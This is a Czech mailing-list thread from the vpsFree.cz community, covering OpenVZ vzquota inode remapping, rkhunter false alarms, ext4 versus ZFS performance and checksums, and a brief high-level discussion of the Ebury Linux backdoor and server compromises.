Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Setkal se s tim i nekdo jiny?
Dik, Ondro
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj,
rika se tomu vzquota.
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Setkal se s tim i nekdo jiny?
Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
A na doplneni: na nodech se ZFS uz vzquota neni, tam se to dit nebude :)
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Setkal se s tim i nekdo jiny?
Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
No dobre, tak jeste teda nejdu spat, tak se trochu rozepisu a vysvetlim, o co jde:
- - kazdej kontejner je slozka na FS - - coz znamena, ze abych mohl limitovat diskspace kontejneru, musel bych mit FS per kontejner, coz trochu drti nektery vyhody kontejneru (napr. agregace mista pri shared FS se proste neda udelat elegantneji)
V OpenVZ to vyresili tak, ze mezi ext*fs/xfs a "simfs" (simulovany fs kontejneru) vlozili vzquotu, coz je neco jako tabulka mapovani muj inode -> node na FS + accounting infromace o velikosti.
Diky tomu pak i funguje second-level quota (tzn. normalni linuxova user/group quota) - coz je neco, co budeme muset do ZFS doimplementovat.
Nevyhoda vzquoty se pozna pri resetu systemu, kdyz nema cas si syncnout ten mapujici soubor na disk. Pak musi vzquota pri startu kazdyho kontejneru projit jeho soubory a znova je namapovat. To je prave to, co ti muze rozhazet cisla inodu.
Bootovani serveru s vzquotou po resetu je pak tragedie a masina s 90 VPS muze naskakovat klidne 3-4 hodiny.
Krom toho je vzquota nachylna na random rozbijeni se i pres tu kontrolu integrity, da se rozbit ze ukazuje min/vic zabranyho mista/inodes, akorat nevim, jak k tomu dochazi (co je trigger toho rozbiti), deje se to jenom zridkakdy.
Also, ukazalo se ze mit vic kontejneru na EXT4 je totalni blbost, v ext4 je nejfatalnejsi problem journal. Stane se bottleneckem celyho toho FS a proste neda se nic. Obzvlast, kdyz nad tim FS bezi par databazi. Iowait leti nahoru, disky seekujou jak pomateny a propustnost filesystemu jde do kytek.
Oproti tomu node se ZFS ma tech 90 VPS nastartovanych do tak 10ti minut jako absolutni maximum. A tech MySQL muze na serveru bezet, co zvlada CPU, protoze na synchronnni zapisy a fuckup unixovyho sveta jmenem sync() ma ZFS mechanismus jmenem Intent Log a moznost ho vysoupnout na dedikovany device. Oproti tomu ext4 ani s dedikovanym journalem na SSD nedela temer zadny rozdil. Pak uz disky tolik neseekujou, ale vykon porad nikde. Btw tahle "vlastnost" ext4ky donutila OpenVZ lidi implementovat ploop, takze pak delaji ext4 in a file per container. So much win! :)
Urcite budem dal pracovat na ZFS podpore, linuxovy filesystemy jsou jedna velka tragedie. Navic se diky tomu muzem zbavit ty tragedie vzquoty.
/snajpa
On 03/15/2014 10:55 PM, Pavel Snajdr wrote:
A na doplneni: na nodech se ZFS uz vzquota neni, tam se to dit nebude :)
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Setkal se s tim i nekdo jiny?
Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/15/2014 11:08 PM, Pavel Snajdr wrote:
No dobre, tak jeste teda nejdu spat, tak se trochu rozepisu a vysvetlim, o co jde:
- kazdej kontejner je slozka na FS - coz znamena, ze abych mohl
limitovat diskspace kontejneru, musel bych mit FS per kontejner, coz trochu drti nektery vyhody kontejneru (napr. agregace mista pri shared FS se proste neda udelat elegantneji)
V OpenVZ to vyresili tak, ze mezi ext*fs/xfs a "simfs" (simulovany fs kontejneru) vlozili vzquotu, coz je neco jako tabulka mapovani muj inode -> node na FS + accounting infromace o velikosti.
Diky tomu pak i funguje second-level quota (tzn. normalni linuxova user/group quota) - coz je neco, co budeme muset do ZFS doimplementovat.
Nevyhoda vzquoty se pozna pri resetu systemu, kdyz nema cas si syncnout ten mapujici soubor na disk. Pak musi vzquota pri startu kazdyho kontejneru projit jeho soubory a znova je namapovat. To je prave to, co ti muze rozhazet cisla inodu.
Bootovani serveru s vzquotou po resetu je pak tragedie a masina s 90 VPS muze naskakovat klidne 3-4 hodiny.
Krom toho je vzquota nachylna na random rozbijeni se i pres tu kontrolu integrity, da se rozbit ze ukazuje min/vic zabranyho mista/inodes, akorat nevim, jak k tomu dochazi (co je trigger toho rozbiti), deje se to jenom zridkakdy.
Also, ukazalo se ze mit vic kontejneru na EXT4 je totalni blbost, v ext4 je nejfatalnejsi problem journal. Stane se bottleneckem celyho toho FS a proste neda se nic. Obzvlast, kdyz nad tim FS bezi par databazi. Iowait leti nahoru, disky seekujou jak pomateny a propustnost filesystemu jde do kytek.
Oproti tomu node se ZFS ma tech 90 VPS nastartovanych do tak 10ti minut jako absolutni maximum. A tech MySQL muze na serveru bezet, co zvlada CPU, protoze na synchronnni zapisy a fuckup unixovyho sveta jmenem sync() ma ZFS mechanismus jmenem Intent Log a moznost ho vysoupnout na dedikovany device. Oproti tomu ext4 ani s dedikovanym journalem na SSD nedela temer zadny rozdil. Pak uz disky tolik neseekujou, ale vykon porad nikde. Btw tahle "vlastnost" ext4ky donutila OpenVZ lidi implementovat ploop, takze pak delaji ext4 in a file per container. So much win! :)
Tady jeste doplnim, ze ty nody s ext4 maji SSDcka a Facebook flashcache modul, tzn. nad RAID10 je flashcache, ktera dela writeback na SSD. Tzn. efektivne vsechny zapisy ext4 do journalu atd., to vsechno slo na SSD odjakziva u nas, ale presto je to na ext4 tragicky pomaly. Nejvic na to nadavam vzdycky, kdyz mam ted migrovat VPS ext4 server -> ZFS server, jak lidem casem ty VPSky nakynuly, tak dostat je ze zdrojovyho nodu je job na desitky hodin per VPS. Doslova mi to pak pripada, jakoze ty VPSky s tim nodem srostly :) Nastesti uz bude klid. ZFS.
/snajpa
Urcite budem dal pracovat na ZFS podpore, linuxovy filesystemy jsou jedna velka tragedie. Navic se diky tomu muzem zbavit ty tragedie vzquoty.
/snajpa
On 03/15/2014 10:55 PM, Pavel Snajdr wrote:
A na doplneni: na nodech se ZFS uz vzquota neni, tam se to dit nebude :)
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Setkal se s tim i nekdo jiny?
Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Je nejaka cesta, jak tu vzquotu nepouzivat, resp. vypnout, aby to pri startu nepocitalo? Linux, ext4 :) Zfs neverim :)
Dne 15. 3. 2014 23:08, Pavel Snajdr napsal(a):
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
No dobre, tak jeste teda nejdu spat, tak se trochu rozepisu a vysvetlim, o co jde:
- kazdej kontejner je slozka na FS
- coz znamena, ze abych mohl limitovat diskspace kontejneru, musel
bych mit FS per kontejner, coz trochu drti nektery vyhody kontejneru (napr. agregace mista pri shared FS se proste neda udelat elegantneji)
V OpenVZ to vyresili tak, ze mezi ext*fs/xfs a "simfs" (simulovany fs kontejneru) vlozili vzquotu, coz je neco jako tabulka mapovani muj inode -> node na FS + accounting infromace o velikosti.
Diky tomu pak i funguje second-level quota (tzn. normalni linuxova user/group quota) - coz je neco, co budeme muset do ZFS doimplementovat.
Nevyhoda vzquoty se pozna pri resetu systemu, kdyz nema cas si syncnout ten mapujici soubor na disk. Pak musi vzquota pri startu kazdyho kontejneru projit jeho soubory a znova je namapovat. To je prave to, co ti muze rozhazet cisla inodu.
Bootovani serveru s vzquotou po resetu je pak tragedie a masina s 90 VPS muze naskakovat klidne 3-4 hodiny.
Krom toho je vzquota nachylna na random rozbijeni se i pres tu kontrolu integrity, da se rozbit ze ukazuje min/vic zabranyho mista/inodes, akorat nevim, jak k tomu dochazi (co je trigger toho rozbiti), deje se to jenom zridkakdy.
Also, ukazalo se ze mit vic kontejneru na EXT4 je totalni blbost, v ext4 je nejfatalnejsi problem journal. Stane se bottleneckem celyho toho FS a proste neda se nic. Obzvlast, kdyz nad tim FS bezi par databazi. Iowait leti nahoru, disky seekujou jak pomateny a propustnost filesystemu jde do kytek.
Oproti tomu node se ZFS ma tech 90 VPS nastartovanych do tak 10ti minut jako absolutni maximum. A tech MySQL muze na serveru bezet, co zvlada CPU, protoze na synchronnni zapisy a fuckup unixovyho sveta jmenem sync() ma ZFS mechanismus jmenem Intent Log a moznost ho vysoupnout na dedikovany device. Oproti tomu ext4 ani s dedikovanym journalem na SSD nedela temer zadny rozdil. Pak uz disky tolik neseekujou, ale vykon porad nikde. Btw tahle "vlastnost" ext4ky donutila OpenVZ lidi implementovat ploop, takze pak delaji ext4 in a file per container. So much win! :)
Urcite budem dal pracovat na ZFS podpore, linuxovy filesystemy jsou jedna velka tragedie. Navic se diky tomu muzem zbavit ty tragedie vzquoty.
/snajpa
On 03/15/2014 10:55 PM, Pavel Snajdr wrote:
A na doplneni: na nodech se ZFS uz vzquota neni, tam se to dit nebude :)
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj, ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu? Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm. Setkal se s tim i nekdo jiny? Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iF4EAREIAAYFAlMkz1cACgkQMBKdi9lkZ6qPcQEAr2brTAOTd9+4FcAB2IOlJw0V MmD7Uso5IIzsU3UjbP4BAMMFyCprg/9r6AClllGYjWh5AdM/fDJw7viLOi2Azcb6 =f3v/ -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/15/2014 11:21 PM, Michal Krajcirovic wrote:
Je nejaka cesta, jak tu vzquotu nepouzivat, resp. vypnout, aby to pri startu nepocitalo? Linux, ext4 :) Zfs neverim :)
Mas v podstate asi tak 4 moznosti:
- - rozdelit kontejnery na samostatny FS treba pres LVM
- - pouzit ploop, pak mas image per kontejner, vyhoda oproti rucnimu spravovani LVM je, ze je to plne integrovany s vzctl, podporuje snapshoty a i je to integrovany s vzmigrate, takze je migrace o hodne rychlejsi, pac se nejdriv syncuje jeden velkej image - samotnej FS kontejneru - a pak mensi rozdilovej image (ten prvni sync se totiz dela vzdycky za behu kontejneru, proto druhej sync)
- - nastavit VZFASTBOOT=yes @ vz.conf, to sice prepocitavani nezrusi, ale kontejnery nastartujou i treba s inkonzistentni vzquotou a dopocita se postupne per kontejner na pozadi. Jenze jak to dopocita, danej kontejner to restartuje, coz se nemusi vzdycky libit a navic start s inkonzistentni vzquotou muze znamenat, ze kernel bude procesum v kontejneru rikat, ze neni volny misto, protoze vzquota zustala v divnym mezistavu
- - vypnout vzquotu uplne (DISK_QUOTA=no v /etc/vz/vz.conf)
Btw. ZFS neni duvod neverit, jenom na nej musis mit dost RAM, ale nema cenu ho davat nekam, kde mas uz ted malo RAM na to, co na tom bezi. Tzn. kdyz ti zbejva po odecteni caches aspon nekolik jednotek GB, tak se toho nemas proc bat :)
/snajpa
Dne 15. 3. 2014 23:08, Pavel Snajdr napsal(a): No dobre, tak jeste teda nejdu spat, tak se trochu rozepisu a vysvetlim, o co jde:
- kazdej kontejner je slozka na FS - coz znamena, ze abych mohl
limitovat diskspace kontejneru, musel bych mit FS per kontejner, coz trochu drti nektery vyhody kontejneru (napr. agregace mista pri shared FS se proste neda udelat elegantneji)
V OpenVZ to vyresili tak, ze mezi ext*fs/xfs a "simfs" (simulovany fs kontejneru) vlozili vzquotu, coz je neco jako tabulka mapovani muj inode -> node na FS + accounting infromace o velikosti.
Diky tomu pak i funguje second-level quota (tzn. normalni linuxova user/group quota) - coz je neco, co budeme muset do ZFS doimplementovat.
Nevyhoda vzquoty se pozna pri resetu systemu, kdyz nema cas si syncnout ten mapujici soubor na disk. Pak musi vzquota pri startu kazdyho kontejneru projit jeho soubory a znova je namapovat. To je prave to, co ti muze rozhazet cisla inodu.
Bootovani serveru s vzquotou po resetu je pak tragedie a masina s 90 VPS muze naskakovat klidne 3-4 hodiny.
Krom toho je vzquota nachylna na random rozbijeni se i pres tu kontrolu integrity, da se rozbit ze ukazuje min/vic zabranyho mista/inodes, akorat nevim, jak k tomu dochazi (co je trigger toho rozbiti), deje se to jenom zridkakdy.
Also, ukazalo se ze mit vic kontejneru na EXT4 je totalni blbost, v ext4 je nejfatalnejsi problem journal. Stane se bottleneckem celyho toho FS a proste neda se nic. Obzvlast, kdyz nad tim FS bezi par databazi. Iowait leti nahoru, disky seekujou jak pomateny a propustnost filesystemu jde do kytek.
Oproti tomu node se ZFS ma tech 90 VPS nastartovanych do tak 10ti minut jako absolutni maximum. A tech MySQL muze na serveru bezet, co zvlada CPU, protoze na synchronnni zapisy a fuckup unixovyho sveta jmenem sync() ma ZFS mechanismus jmenem Intent Log a moznost ho vysoupnout na dedikovany device. Oproti tomu ext4 ani s dedikovanym journalem na SSD nedela temer zadny rozdil. Pak uz disky tolik neseekujou, ale vykon porad nikde. Btw tahle "vlastnost" ext4ky donutila OpenVZ lidi implementovat ploop, takze pak delaji ext4 in a file per container. So much win! :)
Urcite budem dal pracovat na ZFS podpore, linuxovy filesystemy jsou jedna velka tragedie. Navic se diky tomu muzem zbavit ty tragedie vzquoty.
/snajpa
On 03/15/2014 10:55 PM, Pavel Snajdr wrote:
A na doplneni: na nodech se ZFS uz vzquota neni, tam se to dit nebude :)
S pozdravem
Pavel Snajdr
+421 948 816 186 | +420 720 107 791 | 110-010-956 CTO of Relbit | Predseda vpsFree.cz, o.s. | RHCE http://relbit.com | http://vpsfree.cz | https://www.redhat.com
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj, ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu? Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm. Setkal se s tim i nekdo jiny? Dik, Ondro
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
Ahoj,
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
A jeste jsem ti neodpovedel uplne, tvoji VPS jsem prave migroval nedavno z ext node na ZFS node, to zpusobilo tu zmenu inodu. Dal tedka jakakoliv obnova ze zalohy, dalsi migrace atd. bude menit cisla inodu.
Ale jakmile budeme ZFS only, povolime send/recv funkcionalitu a pak by mel ten filesystem VPS vypadat porad konzistentne v case, at je uz se na ten cilovej node dostal migraci nebo obnovenim ze zalohy.
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Jop, a to neni jedina aplikace, kterou to afektuje, i trivialnejsi programy se ridi cislem inodu (tusim i treba git tak detekuje mv souboru).
/snajpa
Setkal se s tim i nekdo jiny?
Dik, Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Diky za podrobnou odpoved, jsem se z toho dost naucil.
On 03/15/2014 11:20 PM, Pavel Snajdr wrote:
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
A jeste jsem ti neodpovedel uplne, tvoji VPS jsem prave migroval nedavno z ext node na ZFS node, to zpusobilo tu zmenu inodu. Dal tedka jakakoliv obnova ze zalohy, dalsi migrace atd. bude menit cisla inodu.
OK.
Ale jakmile budeme ZFS only, povolime send/recv funkcionalitu a pak by mel ten filesystem VPS vypadat porad konzistentne v case, at je uz se na ten cilovej node dostal migraci nebo obnovenim ze zalohy.
Osobne mi prijde ZFS jako velmi dobry filesystem, mozna to kapku prehnali s pouzitim SHA256 na "error-detection/integrity protection" (postacila by jednodussi funkce). Ale jsem rad, ze ZFS driver pro linux je uz pouzitelny :-)
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Jop, a to neni jedina aplikace, kterou to afektuje, i trivialnejsi programy se ridi cislem inodu (tusim i treba git tak detekuje mv souboru).
Tady jen drobna poznamka pro lidi, co treba taky rkhunter pouzivaji - rkhunter je "prvni linie obrany" proti backdoorum, ale mam cim dal vic pocit, ze uz hodne outdated v principech, ktere pouziva.
Doporucuji napriklad analyzu Ebury backdooru: http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
Nad tim kodem se nekdo zamyslel a stravil na tom pravdepodobne nezanedbatelny cas. Krome featur jako pouzivani obskurnich gcc atributu "__attribute__((constructor))" to sleduje, jestli je sitovka v promiskuitnim rezimu (a pak nic neposila) a zaroven exfiltruje hesla pres DNS (kdo filtruje DNS?).
Tady treba rkhunter nezabere, protoze to exploituje vlastnosti dynamickeho linkeru. Patchuje to instrukce v binarce a ma dokonce vlastni SIGSEGV handler, coz se moc casto nevidi.
Ondro
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/16/2014 01:54 AM, Ondrej Mikle wrote:
Diky za podrobnou odpoved, jsem se z toho dost naucil.
On 03/15/2014 11:20 PM, Pavel Snajdr wrote:
On 03/15/2014 10:52 PM, Ondrej Mikle wrote:
ma OpenVZ vlastnost, ze napriklad pri premigrovani kontejneru nebo nejake jine zmene se taky zmeni inode numbers souboru na filesystemu?
A jeste jsem ti neodpovedel uplne, tvoji VPS jsem prave migroval nedavno z ext node na ZFS node, to zpusobilo tu zmenu inodu. Dal tedka jakakoliv obnova ze zalohy, dalsi migrace atd. bude menit cisla inodu.
OK.
Ale jakmile budeme ZFS only, povolime send/recv funkcionalitu a pak by mel ten filesystem VPS vypadat porad konzistentne v case, at je uz se na ten cilovej node dostal migraci nebo obnovenim ze zalohy.
Osobne mi prijde ZFS jako velmi dobry filesystem, mozna to kapku prehnali s pouzitim SHA256 na "error-detection/integrity protection" (postacila by jednodussi funkce). Ale jsem rad, ze ZFS driver pro linux je uz pouzitelny :-)
Z manu ZFS:
- --- checksum=on | off | fletcher2,| fletcher4 | sha256
Controls the checksum used to verify data integrity. The default value is on, which automatically selects an appropriate algorithm (currently, fletcher4, but this may change in future releases). The value off disables integrity checking on user data. Disabling checksums is NOT a recommended practice. Changing this property affects only newly-written data. - ---
Tzn. da se to nastavit per dataset (FS/ZVOL), default je fletcher4, kterej je paradne rychlej. Ale hodi se jenom na checksumy, protoze je hodne nachylnej na (a opravdu pravidelne generuje) kolize.
Tzn. fletcher4 by se nedal pouzit v deduplikacnich tabulkach ZFS, ale ty jsou separatni, takze tam neni problem pouzivat jinej algoritmus, tam se prave pouziva ta sha256.
Ale deduplikace je blbost, zere to pamet, je to pomaly a realne to zadny vyznamny misto pro vetsinu usecases neusetri. Misto toho je lepsi pouzivat kompresi, my se bezne pohybujeme minimalne u 1.3 kompresniho pomeru, to ti zadna deduplikace neda :)
Ptam se proto, ze rkhunter to "spatne nese" a reportuje to. Pri porovnani SHA256 checksumu s cistym systemem i s rpm --verify checksumy sedi. Souboru se zmenenym inode je velka spousta, tim padem z predchoziho vyplyva, ze jde o spis false alarm.
Jop, a to neni jedina aplikace, kterou to afektuje, i trivialnejsi programy se ridi cislem inodu (tusim i treba git tak detekuje mv souboru).
Tady jen drobna poznamka pro lidi, co treba taky rkhunter pouzivaji
- rkhunter je "prvni linie obrany" proti backdoorum, ale mam cim
dal vic pocit, ze uz hodne outdated v principech, ktere pouziva.
Ja se prave divim, ze vubec rkhunter pouzivas, ja mel za to, ze uz to dal nikdo nevyviji, vzdycky mi to prislo jako takovej polomrtvej projekt - nebo se mylim?
/snajpa
Doporucuji napriklad analyzu Ebury backdooru: http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
Nad tim kodem se nekdo zamyslel a stravil na tom pravdepodobne nezanedbatelny cas. Krome featur jako pouzivani obskurnich gcc atributu "__attribute__((constructor))" to sleduje, jestli je sitovka v promiskuitnim rezimu (a pak nic neposila) a zaroven exfiltruje hesla pres DNS (kdo filtruje DNS?).
Tady treba rkhunter nezabere, protoze to exploituje vlastnosti dynamickeho linkeru. Patchuje to instrukce v binarce a ma dokonce vlastni SIGSEGV handler, coz se moc casto nevidi.
Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
On 03/16/2014 02:13 AM, Pavel Snajdr wrote:
On 03/16/2014 01:54 AM, Ondrej Mikle wrote:
Osobne mi prijde ZFS jako velmi dobry filesystem, mozna to kapku prehnali s pouzitim SHA256 na "error-detection/integrity protection" (postacila by jednodussi funkce). Ale jsem rad, ze ZFS driver pro linux je uz pouzitelny :-)
Z manu ZFS:
checksum=on | off | fletcher2,| fletcher4 | sha256 Controls the checksum used to verify data integrity. Thedefault value is on, which automatically selects an appropriate algorithm (currently, fletcher4, but this may change in future releases). The value off disables integrity checking on user data. Disabling checksums is NOT a recommended practice. Changing this property affects only newly-written data.
Tzn. da se to nastavit per dataset (FS/ZVOL), default je fletcher4, kterej je paradne rychlej. Ale hodi se jenom na checksumy, protoze je hodne nachylnej na (a opravdu pravidelne generuje) kolize.
Tzn. fletcher4 by se nedal pouzit v deduplikacnich tabulkach ZFS, ale ty jsou separatni, takze tam neni problem pouzivat jinej algoritmus, tam se prave pouziva ta sha256.
Aha, uplne jsem zapomnel, ze to umi i jine funkce. Pamatuji si, ze jsi na InstallFestu rikal, ze ta linuxova implementace je jiz dostatecne stabilni, Oracle a onehda Sun dost valcil licencne s CDDL.
Tady jen drobna poznamka pro lidi, co treba taky rkhunter pouzivaji
- rkhunter je "prvni linie obrany" proti backdoorum, ale mam cim
dal vic pocit, ze uz hodne outdated v principech, ktere pouziva.
Ja se prave divim, ze vubec rkhunter pouzivas, ja mel za to, ze uz to dal nikdo nevyviji, vzdycky mi to prislo jako takovej polomrtvej projekt - nebo se mylim?
Je to porad udrzovane. Konceptualne je to outdated, jak jsem psal - ale stale dost lidi to pouziva. Je to max na "lame fial haxxore". Ale asi taky nic lepsiho automatizovaneho neznas? Treba nejaky solver, ktery by dokazoval, ze v tom systemu neni neco uplne mimo. Jinak zustava manualni audit, co vzdy zabere dost casu a je to napul magie.
Tenhle typek (Brad Spender, autor PaX/grsecurity) - https://twitter.com/grsecurity - umi psat z kernel patchu local kernel exploity, nekdy tam dava PoC. Coz nove zacina byt celkem bezna praxe - botnetmastri reverzuji patche a pisou podle toho exploity. Zatim predevsim pro Windows, ale trend je videt.
Ondro
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/16/2014 01:54 AM, Ondrej Mikle wrote:
Doporucuji napriklad analyzu Ebury backdooru: http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
Wow,
to je docela sofistikovany... tady uz se asi neda pochybovat, ze tohle nebude prace nejakyho upocenyho nactiletyho nerda bez socialniho zivota.
No, vsak to uz jsme akceptovali vsichni, ze Internet je jedno velky bojiste a ze se ten boj kapku zprofesionalizoval, s tim jak se pres Internety zacly tocit realny penize.
Za posledni mesice/rok vidim opravdu raketovej narust hacknutejch VPS u nas, to driv nebejvalo (to mluvim jak pametnik, ale ono na Internetu ubiha cas trochu jinak, no :D)
Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim, jak se tomu vyhnout, krome prevence/osvety... Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
Automatizovat vyhledavani zastaralejch verzi baliku napric kontejnerama stejne nezachrani deravy wordpressy nachazejici se na tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru takhle se neda. Nevim, moc se s tim asi delat neda no.
Nicmene to je celkem dost OT uz, ale kdyby te k tomu neco napadlo, urcite uvitam input :)
/snajpa
Nad tim kodem se nekdo zamyslel a stravil na tom pravdepodobne nezanedbatelny cas. Krome featur jako pouzivani obskurnich gcc atributu "__attribute__((constructor))" to sleduje, jestli je sitovka v promiskuitnim rezimu (a pak nic neposila) a zaroven exfiltruje hesla pres DNS (kdo filtruje DNS?).
Tady treba rkhunter nezabere, protoze to exploituje vlastnosti dynamickeho linkeru. Patchuje to instrukce v binarce a ma dokonce vlastni SIGSEGV handler, coz se moc casto nevidi.
On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim, jak se tomu vyhnout, krome prevence/osvety... Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
